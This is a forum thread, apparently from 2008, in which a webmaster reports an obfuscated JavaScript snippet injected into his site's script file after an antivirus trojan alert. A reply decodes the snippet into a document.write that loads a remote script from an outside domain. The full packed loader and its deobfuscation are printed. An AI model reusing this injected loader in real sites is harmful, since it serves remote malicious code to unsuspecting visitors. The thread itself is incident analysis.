免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2480 | 回复: 1
打印 上一主题 下一主题

网站被挂马,请都其js代码的含义 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2008-11-19 23:31 |只看该作者 |倒序浏览
这两天打开网站,mcafee就弹出提示说有特洛伊。在页面中检查了下没有发现什么可疑的代码。联想到服务器IP网段几天前受到ARP攻击,于是怀疑是ARP挂马。而是我的服务器及网关进行了IP与MAC绑定。找了一个上午没有解决问题,客服还提出给换了个IP,问题仍旧。

下午又仔细地看代码,也没有找到。最后怀疑可能是挂马的代码加在了网页链接的某个js脚本上,终于在一个脚本文件中找到了下面这段代码:

eval(function(m,y,l,o,v,e){v=function(l){return l.toString(36)};if(!''.replace(/^/,String)){while(l--){e[l.toString(y)]=o[l]||l.toString(y)}o=[function(v){return e[v]}];v=function(){return'\\w+'};l=1};while(l--){if(o[l]){m=m.replace(new RegExp('\\b'+v(l)+'\\b','g'),o[l])}}return m}('9.a(\'<3\'+\'4 b="8\'+\'c://\'+\'%6%0\'+\'%1%7\'+\'%5%0\'+\'%g%k\'+\'%d%l\'+\'%j%1\'+\'/e\'+\'i\'+\'f.2\'+\'h\'+\'2"></3\'+\'4>\');',22,22,'61|6E|p|scr|ipt|68|77|67|ht|document|write|src|tp|69|cl|ck|6F|||63|78|2E'.split('|'),0,{}))

去掉后,问题就解决了。但是现在还没年明白这段代码的意思,请高手指点。

论坛徽章:
3
戌狗
日期:2014-09-10 17:07:162015年辞旧岁徽章
日期:2015-03-03 16:54:15wusuopu
日期:2016-06-17 17:43:45
2 [报告]
发表于 2008-11-20 10:41 |只看该作者
我把eval换成alert了,可以放心测试。函数的返回:document.write('<script src="http://wanghaoxi.cn/click.php"></script>');
  1. //    eval(
  2. //function(m,22,22,o,0,{})
  3. alert(
  4. function(m,y,l,o,v,e)
  5. {
  6.     v=function(l)
  7.     {
  8.         return l.toString(36)
  9.     };
  10.     if(!''.replace(/^/,String))
  11.     {
  12.         while(l--){
  13.             //e[l.toString(y)]= o[l] || l.toString(y);
  14.             e[l.toString(22)]= o[l] || l.toString(22);
  15.             //e[22]=2e;
  16.             //e[21]=78;
  17.             //e[20]=63;
  18.             //e[19]=19;
  19.             //e[18]=18;
  20.             //e[17]=6F;
  21.         }
  22.         o=[ function(v) { return e[v] } ];
  23.         v=function(){
  24.             return'\\w+'
  25.         };
  26.         l=1
  27.     };
  28.     while(l--){
  29.         if(o[l]){
  30.             m=m.replace(new RegExp('\\b'+v(l)+'\\b','g'),o[l])
  31.         }
  32.     }
  33.     //return m
  34.     return unescape(m.replace(/'\+'/g, ""));
  35. }
  36. ('9.a(\'<3\'+\'4 b="8\'+\'c://\'+\'%6%0\'+\'%1%7\'+\'%5%0\'+\'%g%k\'+\'%d%l\'+\'%j%1\'+\'/e\'+\'i\'+\'f.2\'+\'h\'+\'2"></3\'+\'4>\');',22,22,'61|6E|p|scr|ipt|68|77|67|ht|document|write|src|tp|69|cl|ck|6F|||63|78|2E'.split('|'),0,{}));
  37. //)
复制代码
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP